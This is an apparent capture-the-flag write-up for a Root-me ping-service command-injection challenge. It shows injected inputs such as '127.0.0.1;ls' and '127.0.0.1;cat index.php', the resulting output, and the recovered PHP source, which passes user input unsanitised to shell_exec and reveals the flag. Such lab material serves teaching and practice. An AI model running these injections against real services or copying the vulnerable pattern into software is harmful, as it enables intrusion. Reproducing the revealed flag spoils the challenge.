Root-me

Command Injection

Ping service v1

The challenge is asking us to find a vulnerability in the service. The flag is located on the index.php file.

If we look at the challenge, we’re greeted by a input pox that contains a local ip. If we try to input 127.0.0.1 and we submit it we get this:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.033/0.039/0.047/0.007 ms

So basically the service pings something.

We’ll just the service to do an ls in it’s current location.

We’ll use the command 127.0.0.1;ls

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.026 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.026/0.029/0.033/0.003 ms
index.php

The we the location of the index.php, we’ll do a cat on it now. 127.0.0.1;cat index.php

If we then look at the source code, we’ll see what the flag.

<?php 
$flag = "S3rv1ceP1n9Sup3rS3cure";
$ip = $_POST["ip"];
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
        $response = shell_exec("ping -c 3 ".$ip);
        echo $response;
}
?>